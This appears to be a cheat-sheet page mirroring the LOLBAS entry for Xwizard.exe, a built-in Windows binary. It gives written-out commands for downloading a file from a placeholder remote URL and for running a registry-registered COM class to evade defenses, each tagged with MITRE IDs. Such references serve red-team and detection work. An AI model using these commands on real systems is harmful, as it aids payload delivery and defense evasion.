🐚 GTFOBins πŸͺŸ LOLBAS πŸ’Ύ Compiled Binaries 🩸 BloodHound 🩸 bloodyAD πŸ“œ Certipy ☁️ Cloud ⚑ goexec πŸ€– HackTricks πŸ”Œ HardwareATT πŸ“¦ Impacket 🏰 InternalATT πŸ”€ Ligolo-ng 🐱 Mimikatz πŸ’£ msfvenom πŸ”§ NetExec πŸ€– OSAI πŸ’₯ PATT 🍳 Recipes 🎟️ Rubeus 🐍 Sliver
πŸͺŸ LOLBAS / Xwizard.exe

Xwizard.exe

Execute custom class that has been added to the registry or download a file with Xwizard.exe

Download

Download file from Internet

xwizard RunWizard {7940acf8-60ba-4213-a7c3-f3b400ee266d} /z{REMOTEURL}

Xwizard.exe uses RemoteApp and Desktop Connections wizard to download a file, and save it to INetCache. — MITRE: T1105 — Privileges: User

Execute

Run a com object created in registry to evade defensive counter measures

xwizard RunWizard {00000001-0000-0000-0000-0000FEEDACDC}

Xwizard.exe running a custom class that has been added to the registry. — MITRE: T1218 — Privileges: User

Run a com object created in registry to evade defensive counter measures

xwizard RunWizard /taero /u {00000001-0000-0000-0000-0000FEEDACDC}

Xwizard.exe running a custom class that has been added to the registry. The /t and /u switch prevent an error message in later Windows 10 builds. — MITRE: T1218 — Privileges: User